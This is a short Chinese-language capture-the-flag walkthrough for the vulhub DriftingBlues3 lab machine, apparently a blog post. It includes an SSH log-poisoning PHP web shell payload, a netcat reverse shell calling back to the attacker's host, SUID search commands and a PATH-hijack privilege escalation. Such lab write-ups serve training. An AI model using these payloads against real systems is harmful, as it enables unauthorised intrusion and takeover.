vulhub-driftingblues3

某某人8265發表於2024-05-29

發現 /robots.txt -> /eventadmins/ -> /littlequeenofspades.html -> /adminsfixit.php

vulhub-driftingblues3

vulhub-driftingblues3

介面包含ssh日誌,透過嘗試發現ssh連線後會更新日誌,使用php一句話木馬 ssh -l '<?php system($_GET[\"cmd\"]);?>' 192.168.56.111
在kali下執行此命令出現錯誤:

~ >> ssh  -l '<?php system($_GET[\"cmd\"]);?>'  192.168.56.111
remote username contains invalid characters

使用windows下powershell執行後成功

反彈shell driftingblues.box/adminsfixit.php?cmd=nc 192.168.56.1 8000 -e /bin/bash

vulhub-driftingblues3

可見 .ssh 目錄是其他使用者可寫的,生成ssh私鑰用於登入 ssh-keygen -t rsa

vulhub-driftingblues3

提取套路:

  1. linpeas.sh 指令碼資訊收集
  2. pspy 監聽程序
  3. find命令搜尋許可權為s的命令

透過命令搜尋許可權為 s 的命令:

find / -type f -perm -04000 -o -perm -02000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

vulhub-driftingblues3

可見 /usr/bin/getinfo 是自定義指令碼,自己定義命令 cat ip 等使getinfo指令碼在呼叫過程中啟動shell

vulhub-driftingblues3